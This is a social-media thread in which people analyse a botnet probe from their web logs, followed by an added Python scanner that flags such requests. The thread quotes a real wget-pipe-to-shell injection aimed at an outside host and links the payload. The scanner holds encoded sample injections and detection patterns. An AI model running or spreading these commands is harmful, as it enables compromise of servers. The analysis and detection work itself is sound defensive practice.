Decodes to:
cat_id=${system(wget -qO- http://74.194.191.52/rondo.wcr.sh|sh)}
I have to admire the use of POSIX-compliant shell.
Payload is here if anyone is curious: https://pastes.io/wcrrondosh
Obviously don't run it but I love that if you get down far enough it will try to execute a Motorola 68k binary
4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"
That's not how you spell xmlrpc, and that's not where WordPress puts that
I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol
Based on nginx logs there is a package called phpunit which ships a file called, and I am 100% serious, `eval-stdin.php`.
Feels like security research is 10% the most intense shit you've ever seen and 90% "oh no! we left the untrusted strings next to the String Executor!"
@wren6991 i briefly researched this at one point (as I’ve also seen this in my logs)
turns out that this was a part of their test suite that wasn’t supposed to be shipped on any public pages. so in most cases it was downstream’s fault for leaving the composer package directory below the webroot, i suppose?
PHP is full of really idiotic gotchas like this, i swear there’s no reason for the structure to be like this
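A defender-side check for the probes this thread describes (the misspelled xmlrpc path, the phpunit `eval-stdin.php` file, and a `${system(...)}` download-and-pipe-to-shell body in a query parameter), written as an added example and not code from anyone in the thread. The nginx log lines are constructed with TEST-NET addresses, and the vendor path used for eval-stdin.php is an assumption.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed nginx access-log lines (combined format); IPs are TEST-NET addresses.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"
203.0.113.11 - - [12/Nov/2025:23:28:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "-"
203.0.113.12 - - [12/Nov/2025:23:28:09 +0000] "GET /shop.php?cat_id=%24%7Bsystem%28wget%20-qO-%20http%3A%2F%2F203.0.113.99%2Fr.sh%7Csh%29%7D HTTP/1.1" 200 512 "-" "curl/8.0"
198.51.100.7 - - [12/Nov/2025:23:30:00 +0000] "GET /blog/?cat_id=12 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Filenames the thread reports scanners asking for (matched on the path only, not the query).
SCANNER_PATHS = ("/xmrlpc.php", "eval-stdin.php")

# Template-style command injection: a ${system(...)} wrapper, or a wget/curl piped into a shell.
INJECTION_RE = re.compile(r'\$\{\s*system\s*\(|\b(wget|curl)\b[^|]*\|\s*(sh|bash)\b')

def classify_request(line):
    """Return 'scanner-probe', 'command-injection', or None for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    path = urlsplit(target).path
    decoded = unquote(unquote(target))  # two passes so double-encoded payloads decode too
    if any(p in path for p in SCANNER_PATHS):
        return "scanner-probe"
    if INJECTION_RE.search(decoded):
        return "command-injection"
    return None

def scan_log(text):
    """Return (client_ip, verdict, path) for every flagged line, in log order."""
    findings = []
    for line in text.splitlines():
        verdict = classify_request(line)
        if verdict:
            m = LOG_RE.match(line)
            findings.append((m.group("ip"), verdict, urlsplit(m.group("target")).path))
    return findings

if __name__ == "__main__":
    for ip, verdict, path in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {verdict:18} {path}")
```

Feed it a real access log by replacing SAMPLE_LOG with the file contents; the `${system(` pattern is what the decoded `cat_id` payload from the start of the thread looks like before the server has a chance to evaluate it.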
Security conference talks fall into two categories
* we designed a distributed entropy siphon to perform a black-box hypervisor side channel escape and chain-load a persistent rootkit into the CPU cache
* we looked behind the sofa and found an entire industry of products/services that have made no attempt at security at all and are therefore vulnerable to the most basic issues that we've been finding in everything for the past 30 years, and no-one else had bothered to look.
@whitequark @wren6991 "They built for everything" is what i686/i586/i486 suggests to me (AIUI they could just use the i486 binary for all of those, and I'm a little surprised there's no i386).
Also m68k, sparc, and sh4!
@whitequark @wren6991 Given https://types.pl/@wren6991/115539436810358737 I assume it's some random networked device. Wikipedia says "car multimedia terminals, video game consoles, ... or set-top boxes"; maybe some set-top boxes have an HTTP control interface? IP camera?
68k seems more surprising/worrying, since when I last checked they had terrible performance (<100 MHz I think?) and were also really pricey. I assume they're used in industrial-type things that *really* shouldn't be exposed to the internet.